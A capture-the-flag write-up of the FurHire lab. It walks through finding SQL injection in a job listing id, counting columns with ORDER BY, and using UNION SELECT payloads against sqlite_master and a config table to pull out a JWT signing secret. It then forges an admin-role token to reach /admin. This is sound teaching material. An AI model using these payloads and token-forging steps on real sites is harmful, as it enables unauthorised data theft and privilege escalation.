FurHire - SQLi - JWT

FurHire is back, and with some chaining opportunity.

After creating two users, one for hiring and one for job hunting, I noticed that the job listing had a id inside the URL, I should check if that endpoint was vulnerable to IDOR or SQLi. I got a hit on SQLi. The payload AND 1=1-- returned the same value, but AND 1=2-- returned nothing. So that meant SQLi was possible.

Then I tried a UNION SELECT null,null,... attack, but that returned nothing. I went up to 20 nulls, because a valid request would return 17 values I knew it could be a high number of nulls , but nothing worked. Then I turned to SQLMap, but that would not work for some reason. So I guess it was time to read a bit.

After I solved the lab, I revisited the SQLMap problem and discovered I should have used the flag --force-ssl , for some odd reason, SQLMap tried to use HTTP for a redirect.

I discovered a attack method where you would use ORDER BY 1-- and increment the number. Whenever the last time was that worked, was the number you'd need in your UNION SELECT statement.

So in this case, I would need a UNION SELECT with 16 values.

I also read that in some cases playing with null can cause some unexpected behavior, so I also tried a UNION SELECT 1,2,3,...,16

Alright, that worked! In the past, a flag was the admin's password, so I tried to find that with SELECT 1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16 from users where username ='admin' -- but that gave the same result as without the payload, so that meant that there was no user admin where I could extract data from.

Then I tried to figure out what other tables would contain some information. With the payload UNION SELECT 1,2,3,group_concat(name, ', '),5,6,7,8,9,10,11,12,13,14,15,16 from sqlite_master WHERE type='table' I could see what tables would be interesting.

Why not try and see what is hidden in a table called 'config'? With the payload UNION SELECT 1,2,3,sql,5,6,7,8,9,10,11,12,13,14,15,16 from sqlite_master WHERE name='config'-- I could see what the structure was of the table 'config'

I was most interested in the key and value of entries, so I tried to read the first one with the payload UNION SELECT 1,2,3,key,value,6,7,8,9,10,11,12,13,14,15,16 from config--

Apparently, the jwt_secret isphonesCheeseTiramisu1199 🥳

But what to do with it? There where no real endpoints I had encountered that I had a 403 that would encourage me to resign my JWT. So I decided to fuzz some endpoints.

I got a 200 on \admin but when I navigated to there, I got a access denied because my current role was user , so let's update that token.

So I updated my claims on my JWT and resigned it with phonesCheeseTiramisu1199

I took the token I resigned, navigated to /admin ,placed the JWT inside my local storage and refreshed the page.

And like that, I found the flag 🇧🇪